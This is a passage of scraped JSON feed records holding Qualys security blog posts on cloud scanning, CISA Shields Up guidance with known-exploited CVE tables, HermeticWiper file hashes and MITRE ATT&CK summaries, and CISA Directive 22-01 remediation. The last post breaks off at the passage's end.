new zero-touch, cloud-native way of performing agent and agentless security assessments. FlexScan supports four different scanning methods:\n\n * No-touch, agent-less, cloud service provider API-based scanning for fast analysis\n * Virtual network-based scanning to assess unknown workloads over the network for open ports and remotely exploitable vulnerability detection\n * Snapshot assessment that mounts the workload snapshot for periodic offline scanning including vulnerabilities and OSS scanning\n * Qualys Cloud Agents for comprehensive real-time vulnerability and configuration assessments of workloads\n\n### The Advantage of FlexScan\n\nWith FlexScan, you can use multiple scanning methods to scan a workload to get a comprehensive view of its vulnerabilities. For example, a customer with an Internet-facing workload can use both agent and network-based scanning to evaluate it for vulnerabilities and configurations from both an internal and external perspective.\n\nAnd FlexScan does not require complex configurations to get up and running. Qualys FlexScan allows users to use different scanning technologies where they make the most sense, even on the same workloads, with almost no manual configuration.\n\n### **Recommendations on When To Use Each Scanning Method With FlexScan**\n\nNow that you can easily use different scanning methods from the same Qualys platform with FlexScan, we recommend using API-based assessments for your initial scan assessment and evaluating highly ephemeral instances. Use agent-based assessments for long-running workloads because this scan method is the most comprehensive and provides the most accurate six sigma vulnerability detection. If your workloads are externally facing or subject to strict compliance standards, you may want to consider adding network scanning on these assets. Snapshot scanning can look at stopped or paused workloads and instances where examining the entire workload\u2019s file system is required.\n\nJoin us for the TotalCloud launch to see FlexScan in action on how it enables security teams to address the most pressing cloud-native challenges - Wednesday, Nov. 9, at 1:45 pm PT. Register at [www.qualys.com/totalcloud-live](<http://www.qualys.com/totalcloud-live>)\n\nTo learn more about Qualys FlexScan, visit the TotalCloud product page, watch the video, and sign up for a trial.\n\n### Additional Resources\n\n * [TotalCloud sign-up page](<https://www.qualys.com/forms/totalcloud/>)\n * [TotalCloud video](<https://www.qualys.com/totalcloud-video>)\n * [TotalCloud product page](<https://www.qualys.com/apps/totalcloud/>)\n * [Blog - Introducing TotalCloud \u2013 Cloud Security](<https://www.qualys.com/totalcloud-blog>)\n * [TotalCloud press release](<https://www.qualys.com/totalcloud-pr>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-01T13:27:50", "type": "qualysblog", "title": "Why Is Snapshot Scanning Not Enough?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2021-22965", "CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-11-01T13:27:50", "id": "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/shodan-assets-1070x505.jpg)\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/Industrial-control-systems-1070x513.jpg)\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/open-ports-rdp-1070x406.jpg)\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/missing-antivirus-1070x686.jpg)\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/antvirus-signatures-1070x619.jpg)\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/zerotouch-1070x602.jpg)\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/csam-inventory-1070x575.jpg)\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/prioritizationreport-1070x602.jpg)\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/Picture6-1070x810.jpg)\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/Picture7.png)\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/EDR-1070x512.jpg)\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n 